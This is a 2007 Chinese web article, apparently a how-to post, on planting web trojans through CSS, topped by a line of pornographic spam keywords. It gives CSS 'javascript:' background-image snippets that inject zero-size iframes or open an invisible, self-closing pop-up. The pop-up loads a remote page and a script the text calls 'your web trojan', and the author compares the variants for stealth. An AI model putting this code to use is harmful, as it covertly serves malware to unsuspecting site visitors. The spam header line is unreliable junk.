欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

真正能用,還有點(diǎn)效果的CSS掛馬代碼的方法

 更新時(shí)間:2007年10月08日 22:43:39   作者:  
網(wǎng)上流行的:
body

background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法會(huì)使主頁(yè)不正常.返回一片空白.
用彈窗.
body

background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//彈出一個(gè)框.難看 易被發(fā)現(xiàn).
改進(jìn)一下:

body

background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代碼,a.js為你的網(wǎng)馬,彈出一個(gè)不可見(jiàn)的窗口,并在5秒自動(dòng)后關(guān)閉沒(méi)提示:
<script src="a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script> 
a.js內(nèi)容:
document.write('<Iframe src="http://192.168.0.5/calc.htm"></iframe>'); 
請(qǐng)指教. 

相關(guān)文章

最新評(píng)論